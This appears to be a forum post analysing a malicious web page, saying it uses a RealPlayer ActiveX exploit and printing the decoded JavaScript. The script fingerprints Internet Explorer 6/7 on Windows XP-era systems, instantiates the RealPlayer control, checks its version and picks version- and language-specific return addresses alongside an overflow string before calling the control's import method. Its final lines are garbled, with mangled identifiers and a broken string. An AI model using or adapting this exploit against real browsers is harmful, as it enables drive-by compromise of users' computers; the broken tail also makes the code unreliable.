Looks like they're using the Real Audio exploit and ActiveX.
The decoded the javascript comes to
Code:
<!-- ScRIpT language=jAvAsCrIpT>
kxmz="Gd"
ldzi="dp"
hjlo="cP"
wyad="DG"
mjhb="xf"
qjyf="up"
gomv="pP"
esih="PC"
vahe="sl"
bwaj="Pe"
qptw="pu"
lupe="Pe"
gmsq="CE"
qaxo="WE"
jsps="pO"
qerd="OU"
upyd="fQ"
mmsr="ph"
pjqp="kM"
yfss="Lu"
umso="pE"
xeqx="SO"
thrb="ou"
xies="Vp"
ulaz="XO"
pggs="oU"
nluv="Fp"
glqf="lE"
ocbv="Qu"
ichu="Fh"
vcix="kG"
ymzo="EC"
eigs="LX"
hkub="kw"
vqwo="TR"
guki="nw"
xein="xp"
vczs="sO"
yxfg="Ee"
qwhg="fH"
jafj="Kg"
nhlf="VR"
xtmv="pP"
wngm="SO"
hmfq="ec"
hkxf="Cl"
pmaf="yd"
yufh="Yd"
tjry="qz"
edks="MP"
enjr="sl"
ayig="eC"
ctie="sM"
pjfw="kp"
cqjs="ok"
roye="NQ"
ubem="pC"
egvc="JM"
btcd="fg"
qite="tP"
svkg="xL"
sfad="AL"
ydxw="Kp"
vkqm="MP"
wxlb="cm"
kywx="ZT"
ygjf="PN"
nzst="Ko"
olbv="qc"
ngop="Ka"
muir="OG"
gqkt="eN"
itdq="WE"
tkqr="NX"
fswz="kU"
sdjo="NB"
akxy="TP"
xuxu="CM"
cige="mf"
wnll="VX"
rhwh="KP"
dajx="Ld"
iael="Kx"
acvb="ku"
omrq="Nq"
vbhf="LP"
hokj="Sm"
pjxe="MX"
giib="kP"
naed="Dh"
qwzq="KP"
jdiw="cl"
omzz="ej"
civk="KE"
jgii="ne"
ikyl="yL"
msdy="sN"
trfx="XE"
pczp="GO"
snyl="OO"
jdmy="OO"
syrx="oh"
ufub="nT"
zzst="NP"
tdza="nN"
shqt="Ll"
pmuj="aW"
xpwj="iN"
mgwo="uK"
odzf="xY"
yfjp="Ho"
ljir="nX"
nkog="Zp"
jdqf="Ng"
aucy="nM"
woge="hn"
gqty="Rg"
nfxy="sc"
gaty="VQ"
quas="jb"
diks="Og"
pniu="pF"
iumj="xW"
nthi="dw"
baua="Tg"
nlqn="PS"
dkqf="jr"
loxk="OB"
bqhl="Og"
irwb="GW"
whss="wg"
tlbl="wr"
kgrx="Nw"
lcho="Pv"
yepj="LV"
vzdh="Qw"
qevl="IV"
lxln="OV"
bbjy="nF"
mxuz="lf"
pbao="nF"
fmbo="Iv"
cdil="ER"
qhww="nf"
irru="cv"
wner="Ov"
iwcd="MB"
pkpn="oW"
cfnb="pF"
swbb="aw"
bamn="Dv"
uvhs="SF"
mynm="hb"
ltgd="ov"
bnpi="lf"
agqo="Qw"
hnvk="Cg"
xnmp="Du"
eqto="OG"
fvnj="pF"
otyn="ag"
exuj="Tf"
runn="sF"
rscr="xr"
puor="oG"
qtmq="Pf"
xstq="aW"
uoti="tV"
yxrz="cV"
xgax="xR"
olmt="Nv"
kccj="Eg"
ktkw="hv"
wvev="EP"
pddu="P"
djsw="TY"
psqq="XX"
atdr="XX"
qwbe="fi"
obom="Aq"
fodb="cY"
xpxh="fP"
wufy="AA"
njlo="ei"
sugg="Ao"
stps="HF"
zgpo="XZ"
jzfq="Pi"
pzic="Ak"
aoed="jb"
ojuj="rI"
uwxl="Pi"
oxbp="Ag"
ppvv="Vb"
lpmd="aa"
thwz="Pi"
qohc="Ac"
mtzn="kw"
touu="zO"
krrn="PL"
bhee="iA"
zbka="sl"
xexm="oU"
dtfn="WP"
hpdp="iA"
ryan="Zc"
lpjr="za"
somv="bP"
chun="iA"
iybi="Vq"
ghyc="Kp"
zfwi="AP"
ljbe="iA"
axyd="RC"
lwrq="pD"
ehyj="XP"
pdbd="Ql"
azku="aa"
kfvn="Tb"
rlnl="aa"
adfg="aL"
ymkk="tU"
towd="AA"
drsg="AA"
mdep="CF"
nzdk="ia"
igqg="aP"
ofvv="oH"
yftm="Hm"
ukaj="Da"
fzdu="hi"
cmlk="va"
qofl="bo"
dtvg="wa"
vqqw="bX"
dhlo="kn"
bvwh="EN"
blnc="Ij"
tkpa="dp"
jnvz="PP"
zsjd="PP"
jbfh="pU"
wrwx="ov"
slzr="dz"
ihqh="As"
ckmn="Pp"
hdll="PP"
knnx="pP"
jwuh="Ph"
oqyq="kt"
jrow="pp"
umee="lX"
qxhz="Kw"
hcpu="pq"
sluo="lz"
phcg="mh"
ugrj="KV"
diqh="HP"
ewwh="xX"
seqc="Ko"
wyxw="Gf"
cfnv="ZP"
yqux="tu"
iqib="YN"
cfdy="hD"
mwzh="tp"
hpxr="pP"
xian="pP"
zrtn="pN"
wqyt="Bo"
vyqa="Yf"
bhui="Xf"
faio="of"
bcqq="NP"
ncvq="PP"
uszl="pF"
vjwl="hG"
bcmn="Eg"
jrmk="Bv"
ebed="LF"
ayls="me"
gsfj="tO"
vqvp="oa"
sbew="fX"
ihme="KN"
cjuf="xn"
kclq="hB"
csdl="nP"
mgpy="pP"
kokn="pP"
cnce="PH"
efhw="Cn"
lutg="LR"
hgnw="PX"
xntf="Km"
ebhj="lV"
lgzt="Jr"
alwd="pu"
farx="co"
nyyl="Oe"
zcug="fP"
dmjm="Dl"
rfmr="gp"
wwix="tp"
vett="SU"
lbfg="lV"
dlvf="qR"
davr="NV"
yntp="eL"
mfpz="PR"
acqc="OD"
eqka="UC"
xdzj="TV"
bnry="ER"
qycq="SI"
rrqh="ON"
kk();
function kk()
{
var user = navigator.userAgent.toLowerCase();
if(user.indexOf("nt 5.")==-1)
return;
if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
return;
try
{
Real = new ActiveXObject("IER" + "PCtl.I" + "ERP" + "Ctl.1");
}catch(error)
{
return;
}
werq = Real.PlayerProperty(mfpz+acqc+eqka+xdzj+bnry+qycq+rrqh);
sfsdf = "";
jiji = unescape("%75%06%74%04");
for(i=0;i<32*148;i++)
sfsdf += "S";
if(werq.indexOf("6.0.14.") == -1)
{
if(navigator.userLanguage.toLowerCase() == "zh-cn")
ret = unescape("%7f%a5%60");
else if(navigator.userLanguage.toLowerCase() == "en-us")
ret = unescape("%4f%71%a4%60");
else
return;
}
else if(werq == "6.0.14.544")
ret = unescape("%63%11%08%60");
else if(werq == "6.0.14.550")
ret = unescape("%63%11%04%60");
else if(werq == "6.0.14.552")
ret = unescape("%79%31%01%60");
else if(werq == "6.0.14.543")
ret = unescape("%79%31%09%60");
else if(werq == "6.0.14.536")
ret = unescape("%51%11%70%63");
else
return;
\"c:\\Program Files\\";
iusd = "NetMeeting\\TestSnd";
Real.Imporkswdf +iusd + ".wav", gogo,"", 0, 0);
}
</sCrIpT>